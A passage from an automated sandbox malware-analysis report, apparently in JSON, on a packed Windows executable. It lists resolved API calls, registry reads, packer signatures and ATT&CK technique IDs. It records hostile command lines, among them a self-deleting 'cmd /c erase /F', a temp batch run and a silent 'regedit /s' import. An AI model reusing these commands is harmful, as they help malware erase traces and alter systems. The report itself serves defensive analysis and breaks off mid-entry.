\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter DeleteService (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CreateServiceA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter OpenServiceA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter StartServiceA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter ControlService (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter RegFlushKey (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter SetSecurityInfo (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetSecurityInfo (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetInputState (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetMessageA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter PostThreadMessageA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter DeleteCriticalSection (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSection (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter WSACleanup (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter inet_ntoa (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter EnableHook (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter DisableHook (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter WinExec (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"12001300f8303700@PSAPI.DLL\"\n \"15001600c03e536b@ADVAPI32.dll\"\n \"0e000f00703f536b@ADVAPI32.dll\"\n \"0e000f00cc3f536b@ADVAPI32.dll\"\n \"11001200b447536b@ADVAPI32.dll\"\n \"110012004848536b@ADVAPI32.dll\"\n \"120013008c48536b@ADVAPI32.dll\"\n \"12001300e448536b@ADVAPI32.dll\"\n \"14001500386e536b@ADVAPI32.dll\"\n \"14001500506e536b@ADVAPI32.dll\"\n \"14001500686e536b@ADVAPI32.dll\"\n \"17001800806e536b@ADVAPI32.dll\"\n \"0d000e00986e536b@ADVAPI32.dll\"\n \"11001200a86e536b@ADVAPI32.dll\"\n \"11001200bc6e536b@ADVAPI32.dll\"\n \"0f001000fc6f536b@ADVAPI32.dll\"\n \"140015003c70536b@ADVAPI32.dll\"\n \"140015005470536b@ADVAPI32.dll\"\n \"0c000d009c70536b@ADVAPI32.dll\"\n \"0c000d00ac70536b@ADVAPI32.dll\"\n \"0e000f00bc70536b@ADVAPI32.dll\"\n \"0e000f00cc70536b@ADVAPI32.dll\"\n \"0b000c00dc70536b@ADVAPI32.dll\"\n \"180019001473536b@RPCRT4.dll\"\n \"130014004073536b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77730000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"CreateProcessA\" with parameter \"cmd /c erase /F \"C:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\"\" - (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"cmd /c erase /F \"C:\\\\070e719b0b9b5027c8629b058868f8faa6d224cdc4f ...\" (UID: 00000000-00005548), Spawned process \"cmd.exe\" with commandline \"/c %TEMP%\\\\iyail.bat\" (UID: 00000000-00005116), Spawned process \"regedit.exe\" with commandline \"regedit /s %TEMP%\\\\xfshejg.reg\" (UID: 00000000-00006048)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"cmd /c erase /F \"C:\\\\070e719b0b9b5027c8629b058868f8faa6d224cdc4f ...\" (UID: 00000000-00005548), Spawned process \"cmd.exe\" with commandline \"/c %TEMP%\\\\iyail.bat\" (UID: 00000000-00005116), Spawned process \"regedit.exe\" with commandline \"regedit /s %TEMP%\\\\xfshejg.reg\" (UID: 00000000-00006048)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c %TEMP%\\\\iyail.bat\" (UID: 00000000-00005116)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"regedit.exe\" (UID: 00000000-00006048) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" was detected as \"ACProtect\" and name: \"Protector\"\n \"xmloder.exe\" was detected as \"ACProtect\" and name: \"Protector\"\n \"xmlDown.dll\" was detected as \"ACProtect\" and name: \"Protector\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: xmloder.exe)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: xmlDown.dll)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has an writable section named \".text\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has an writable section named \".data\"\n \"xmloder.exe\" has an writable section named \".text\"\n \"xmloder.exe\" has an writable section named \".data\"\n \"xmlDown.dll\" has an writable section named \".text\"\n \"xmlDown.dll\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has an executable section named \".text\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has an executable section named \".data\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has an executable section named \".reloc\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has an executable section named \".perplex\"\n \"xmloder.exe\" has an executable section named \".text\"\n \"xmloder.exe\" has an executable section named \".data\"\n \"xmloder.exe\" has an executable section named \".reloc\"\n \"xmloder.exe\" has an executable section named \".perplex\"\n \"xmlDown.dll\" has an executable section named \".text\"\n \"xmlDown.dll\" has an executable section named \".data\"\n \"xmlDown.dll\" has an executable section named \".reloc\"\n \"xmlDown.dll\" has an executable section named \".perplex\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" was detected as \"tElock v1.0 (private) -> tE!\"\n \"xmloder.exe\" was detected as \"tElock v1.0 (private) -> tE!\"\n \"xmlDown.dll\" was detected as \"tElock v1.0 (private) -> tE!\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE\"; Key: \"INSTALLLANGUAGE\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-19", "relevance": 10, "name": "Found Delphi 4 - Delphi 2006 artifact", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has a PE timestamp using the buggy magic timestamp 0x2A425E19.\n \"xmloder.exe\" has a PE timestamp using the buggy magic timestamp 0x2A425E19. The real compilation date is probably Mon May 4 10:29:12 1970\n \"xmlDown.dll\" has a PE timestamp using the buggy magic timestamp 0x2A425E19. The real compilation date is probably Mon May 4 10:29:12 1970", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\wsock32.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\Debug\\xmlDown.ENU.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\Debug\\xmlDown.EN.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\cmd.exe\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\WSOCK32.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\CRYPTBASE.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\debug\\XMLDOWN.ENU.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\debug\\XMLDOWN.EN.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\CMD.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" reads file \"c:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\"\n \"cmd.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\iyail.bat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n 